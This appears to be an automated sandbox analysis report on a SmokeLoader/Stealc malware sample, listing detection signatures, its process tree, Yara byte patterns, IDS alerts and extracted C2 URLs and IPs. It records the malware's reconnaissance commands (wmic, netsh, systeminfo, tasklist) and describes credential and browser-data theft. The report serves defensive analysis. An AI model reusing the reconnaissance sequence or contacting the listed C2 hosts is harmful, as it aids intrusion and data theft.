
Windows Analysis Report
O4zPA1oI9Y.exe

Overview

General Information

Sample name: O4zPA1oI9Y.exe (renamed because the original name is a hash value)
Original sample name: 2942cb9fca04e939af4ed1eef717e123.exe
Analysis ID: 1529186
MD5: 2942cb9fca04e939af4ed1eef717e123
SHA1: 1bc59ca5e75f717dcd23b73634910b35314bcdee
SHA256: a76320bf90703f6591b6ec9a66522652c04ea3d87ed57f906cf0f8db209cb4c3
Tags: exe, Stealc, user-abuse_ch

Detection

SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • O4zPA1oI9Y.exe (PID: 2924 cmdline: "C:\Users\user\Desktop\O4zPA1oI9Y.exe" MD5: 2942CB9FCA04E939AF4ED1EEF717E123)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • DE97.exe (PID: 5780 cmdline: C:\Users\user\AppData\Local\Temp\DE97.exe MD5: 1096F19319B5C475C2A12B8D0CC4022D)
      • 8CAE.exe (PID: 5144 cmdline: C:\Users\user\AppData\Local\Temp\8CAE.exe MD5: 65AEAA0A0849CB3CE9BC15BCBF0B7B9F)
        • cmd.exe (PID: 6360 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 3060 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6720 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 5336 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 4608 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1444 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1432 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1912 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3532 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 2616 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 368 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3796 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 6688 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 1120 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • WMIC.exe (PID: 3764 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • ipconfig.exe (PID: 3580 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • ROUTE.EXE (PID: 3264 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
          • netsh.exe (PID: 5952 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
          • systeminfo.exe (PID: 3112 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • tasklist.exe (PID: 1020 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • explorer.exe (PID: 3536 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 1908 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 2736 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1600 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 3488 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • jvgasii (PID: 7004 cmdline: C:\Users\user\AppData\Roaming\jvgasii MD5: 2942CB9FCA04E939AF4ED1EEF717E123)
  • uegasii (PID: 6104 cmdline: C:\Users\user\AppData\Roaming\uegasii MD5: 1096F19319B5C475C2A12B8D0CC4022D)
  • msiexec.exe (PID: 4852 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
Name: SmokeLoader
Description: The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual download returns an HTTP 404 but still contains data in the response body.
Attribution: SMOKY SPIDER
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
Malware configuration: {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
Source | Rule | Description | Author | Strings
00000000.00000002.2233484367.000000000061F000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x39d9:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.3040636907.0000000000600000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000A.00000002.3041248373.0000000000743000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown
  • 0x3bdc:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp | JoeSecurity_SmokeLoader_2 | Yara detected SmokeLoader | Joe Security
00000006.00000002.2516872418.00000000006F1000.00000004.10000000.00040000.00000000.sdmp | Windows_Trojan_Smokeloader_4e31426e | unknown | unknown
  • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
(24 Yara matches in total; only the first entries are shown here)

    System Summary

    Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\user\AppData\Roaming\jvgasii, CommandLine: C:\Users\user\AppData\Roaming\jvgasii, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jvgasii, NewProcessName: C:\Users\user\AppData\Roaming\jvgasii, OriginalFileName: C:\Users\user\AppData\Roaming\jvgasii, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\jvgasii, ProcessId: 7004, ProcessName: jvgasii
    Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6360, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 3796, ProcessName: WMIC.exe
    Source: Process started | Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' | Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6360, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 3264, ProcessName: ROUTE.EXE
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-10-08T18:24:20.948318+0200 | 2829848 | 2 | Potentially Bad Traffic | 23.145.40.168 | 443 | 192.168.2.6 | 61433 | TCP


    AV Detection

    Source: O4zPA1oI9Y.exe | Avira: detected
    Source: C:\Users\user\AppData\Roaming\jvgasii | Avira: detection malicious, Label: HEUR/AGEN.1312571
    Source: 0000000A.00000002.3040798589.00000000006B0000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["https://ninjahallnews.com/search.php", "https://fallhandbat.com/search.php"]}
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | ReversingLabs: Detection: 42%
    Source: C:\Users\user\AppData\Roaming\jvgasii | ReversingLabs: Detection: 78%
    Source: O4zPA1oI9Y.exe | ReversingLabs: Detection: 78%
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\jvgasii | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Roaming\uegasii | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\DE97.exe | Joe Sandbox ML: detected
    Source: O4zPA1oI9Y.exe | Joe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Code function: 11_2_00007FF7CBCA36F0 CryptExportKey,CryptExportKey,11_2_00007FF7CBCA36F0
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Code function: 11_2_00007FF7CBCA3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,11_2_00007FF7CBCA3220
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00433098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,13_2_00433098
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00433717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,13_2_00433717
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00433E04 RtlCompareMemory,CryptUnprotectData,13_2_00433E04
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_004311E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,13_2_004311E1
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00431198 CryptBinaryToStringA,CryptBinaryToStringA,13_2_00431198
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_0043123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,13_2_0043123B
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00431FCE CryptUnprotectData,RtlMoveMemory,13_2_00431FCE
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_02F0263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_02F0263E
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_02F0245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,16_2_02F0245E
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 16_2_02F02404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,16_2_02F02404
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_00472799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,18_2_00472799
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 18_2_004725A4 CryptBinaryToStringA,CryptBinaryToStringA,18_2_004725A4
    Source: O4zPA1oI9Y.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\O4zPA1oI9Y.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
    Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.6:61410 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61433 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61434 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61435 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61436 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61437 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61438 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61439 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61440 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61441 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61442 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61443 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61444 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61445 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61446 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61447 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61448 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61449 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61450 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61451 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61452 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61454 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61463 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61465 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61467 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.6:61470 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\8CAE.exe | Code function: 11_2_00007FF7CBCAFB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,11_2_00007FF7CBCAFB38
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00432B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_00432B15
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00431D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_00431D4A
    Source: C:\Windows\SysWOW64\explorer.exe | Code function: 13_2_00433ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_00433ED9
    Source: C:\Windows\explorer.exe | Code function: 15_2_00E330A8 FindFirstFileW,FindNextFileW,FindClose,15_2_00E330A8
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
    Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

    Networking

    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49836 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49842 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61315 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61297 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61260 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61302 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49843 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61321 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61308 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61270 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61340 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61360 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61365 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61388 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61327 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61355 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61382 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61428 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61430 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61334 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61426 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61427 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61375 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61397 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61404 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61429 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61425 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61424 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61279 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61455 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61461 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61370 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61462 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61459 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61466 -> 190.249.249.14:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61457 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61347 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61419 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61458 -> 160.177.223.165:80
    Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:61464 -> 190.249.249.14:80
